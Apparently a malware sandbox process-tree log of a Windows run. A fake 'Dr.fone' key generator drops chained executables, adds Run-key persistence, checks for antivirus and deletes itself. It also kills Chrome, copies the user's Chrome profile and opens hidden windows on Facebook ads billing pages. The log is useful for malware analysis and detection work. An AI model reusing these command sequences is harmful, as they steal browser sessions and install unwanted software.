C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:788
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4704
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3160
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:2672
-
C:\Windows\System32\DataExchangeHost.exeC:\Windows\System32\DataExchangeHost.exe -Embedding1⤵PID:5536
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:5872 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5BC660DC8E08B4015187509DCF22B102 C2⤵
- Loads dropped DLL
PID:5944
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3E46A51CD43D9E390B7AAE3351A70DB02⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:6684
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
- Drops file in Windows directory
PID:7096 -
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵
- Adds Run key to start application
PID:6372 -
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"4⤵
- Checks computer location settings
- Suspicious use of SendNotifyMessage
PID:644 -
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1b0,0x1ec,0x7ff90b4a9ec0,0x7ff90b4a9ed0,0x7ff90b4a9ee05⤵PID:5164
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1660,4809384303783889108,17331893310845126710,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw644_1917249224" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1680 /prefetch:25⤵PID:5656
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1660,4809384303783889108,17331893310845126710,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw644_1917249224" --mojo-platform-channel-handle=1728 /prefetch:85⤵
- Modifies system certificate store
PID:7512
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1660,4809384303783889108,17331893310845126710,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw644_1917249224" --mojo-platform-channel-handle=2152 /prefetch:85⤵
- Checks whether UAC is enabled
PID:8044
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1660,4809384303783889108,17331893310845126710,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw644_1917249224" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2600 /prefetch:15⤵
- Checks computer location settings
PID:6564
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1660,4809384303783889108,17331893310845126710,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw644_1917249224" --mojo-platform-channel-handle=3100 /prefetch:85⤵
- Checks processor information in registry
PID:7440
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1660,4809384303783889108,17331893310845126710,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw644_1917249224" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3060 /prefetch:25⤵PID:6284
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1660,4809384303783889108,17331893310845126710,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw644_1917249224" --mojo-platform-channel-handle=3560 /prefetch:85⤵PID:1856
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1660,4809384303783889108,17331893310845126710,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw644_1917249224" --mojo-platform-channel-handle=3376 /prefetch:85⤵PID:6476
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1660,4809384303783889108,17331893310845126710,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw644_1917249224" --mojo-platform-channel-handle=3340 /prefetch:85⤵PID:6288
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,4809384303783889108,17331893310845126710,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw644_1917249224" --mojo-platform-channel-handle=828 /prefetch:85⤵PID:7648
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE95DF.bat" "3⤵PID:4048
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"4⤵
- Views/modifies file attributes
PID:4904
-
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
PID:7240
-
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
PID:5492
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE95DF.bat"4⤵
- Views/modifies file attributes
PID:584
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE95DF.bat" "4⤵PID:5400
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"4⤵PID:6972
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE95BF.bat" "3⤵PID:5352
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"4⤵
- Views/modifies file attributes
PID:7892
-
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
PID:5724
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE95BF.bat"4⤵
- Views/modifies file attributes
PID:4112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE95BF.bat" "4⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:6236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"4⤵PID:8088
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6132
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4756
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:6996 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{654a4584-ddbc-4d45-a2fc-02380a201167}\oemvista.inf" "9" "4d14a44ff" "0000000000000158" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:6264
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000158"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:1328
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
PID:1824
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:416
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7416
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7916
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\d4a4403d87a44e33a1fb72b1e7cbbd29 /t 4732 /p 79161⤵PID:7560
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\52cec7daec1d47828fc4e7cfa45a59ef /t 7636 /p 74161⤵PID:4792
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8140
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:3856 -
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Suspicious use of SetWindowsHookEx
PID:5844
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:8036
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7840
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6496
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6064
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵PID:6336
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6872
-
C:\Users\Admin\AppData\Local\Temp\Temp2_Wondershare.Dr.fone.For.5.5.0.key.generator.zip\Wondershare.Dr.fone.For.5.5.0.key.generator.exe"C:\Users\Admin\AppData\Local\Temp\Temp2_Wondershare.Dr.fone.For.5.5.0.key.generator.zip\Wondershare.Dr.fone.For.5.5.0.key.generator.exe"1⤵PID:6584
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen.bat" "2⤵PID:2340
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵PID:6380
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe"4⤵
- Suspicious use of SetThreadContext
PID:6800 -
C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe -txt -scanlocal -file:potato.dat5⤵PID:4012
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-1.exekeygen-step-1.exe3⤵PID:2208
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-2.exekeygen-step-2.exe3⤵
- Suspicious use of SetThreadContext
PID:3968 -
C:\Users\Admin\AppData\Roaming\D5DB.tmp.exe"C:\Users\Admin\AppData\Roaming\D5DB.tmp.exe"4⤵PID:5216
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\D5DB.tmp.exe"5⤵PID:8400
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:8432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-2.exe"4⤵PID:7920
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-2.exe"5⤵PID:6632
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7920 -s 2685⤵
- Drops file in Windows directory
- Program crash
PID:2164
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-2.exe" >> NUL4⤵PID:7204
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:6092
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-4.exekeygen-step-4.exe3⤵
- Checks computer location settings
PID:7932 -
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"4⤵PID:1984
-
C:\Users\Admin\AppData\Local\Temp\BR8QCOXSRF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\BR8QCOXSRF\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Drops file in Windows directory
PID:1940 -
C:\Users\Admin\AppData\Local\Temp\BR8QCOXSRF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\BR8QCOXSRF\multitimer.exe" 1 3.1617987860.60708914f1a1d 1016⤵
- Adds Run key to start application
PID:4116 -
C:\Users\Admin\AppData\Local\Temp\BR8QCOXSRF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\BR8QCOXSRF\multitimer.exe" 2 3.1617987860.60708914f1a1d7⤵
- Checks for any installed AV software in registry
PID:6924 -
C:\Users\Admin\AppData\Local\Temp\bb3yyjw4sz3\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\bb3yyjw4sz3\Setup3310.exe" /Verysilent /subid=5778⤵PID:7776
-
C:\Users\Admin\AppData\Local\Temp\is-U5A1Q.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-U5A1Q.tmp\Setup3310.tmp" /SL5="$70498,138429,56832,C:\Users\Admin\AppData\Local\Temp\bb3yyjw4sz3\Setup3310.exe" /Verysilent /subid=5779⤵PID:6752
-
C:\Users\Admin\AppData\Local\Temp\is-KEDNE.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-KEDNE.tmp\Setup.exe" /Verysilent10⤵PID:5504
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\iz5ityid4zf\kdp3zbvkdjh.exe"C:\Users\Admin\AppData\Local\Temp\iz5ityid4zf\kdp3zbvkdjh.exe" /ustwo INSTALL8⤵PID:4260
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "kdp3zbvkdjh.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\iz5ityid4zf\kdp3zbvkdjh.exe" & exit9⤵PID:9028
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "kdp3zbvkdjh.exe" /f10⤵
- Kills process with taskkill
PID:5232
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kudvq2fcehc\app.exe"C:\Users\Admin\AppData\Local\Temp\kudvq2fcehc\app.exe" /8-238⤵PID:7564
-
C:\Users\Admin\AppData\Local\Temp\kudvq2fcehc\app.exe"C:\Users\Admin\AppData\Local\Temp\kudvq2fcehc\app.exe" /8-239⤵PID:6584
-
-
-
C:\Users\Admin\AppData\Local\Temp\33kuiitkyas\setup_10.2_us3.exe"C:\Users\Admin\AppData\Local\Temp\33kuiitkyas\setup_10.2_us3.exe" /silent8⤵PID:10356
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Y6QM3CAZ3I\setups.exe"C:\Users\Admin\AppData\Local\Temp\Y6QM3CAZ3I\setups.exe" ll5⤵PID:7952
-
C:\Users\Admin\AppData\Local\Temp\is-JO853.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-JO853.tmp\setups.tmp" /SL5="$2076E,1873631,71168,C:\Users\Admin\AppData\Local\Temp\Y6QM3CAZ3I\setups.exe" ll6⤵
- Checks computer location settings
PID:5780
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Version.exe"4⤵
- Drops file in Program Files directory
PID:7380 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins0000.vbs"5⤵PID:5148
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:1120
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"4⤵PID:7664
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:5532
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:5628
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y5⤵
- Enumerates system info in registry
PID:1120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/5⤵PID:5308
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff90bb06e00,0x7ff90bb06e10,0x7ff90bb06e206⤵PID:6092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1688 /prefetch:86⤵PID:2372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2228 /prefetch:86⤵PID:6020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2780 /prefetch:16⤵
- Adds Run key to start application
PID:6264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2772 /prefetch:16⤵PID:6328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:16⤵PID:7488
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:16⤵PID:5808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:16⤵PID:7724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1632,1838860595938713043,7353383537394241252,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1636 /prefetch:26⤵PID:3324
-
-
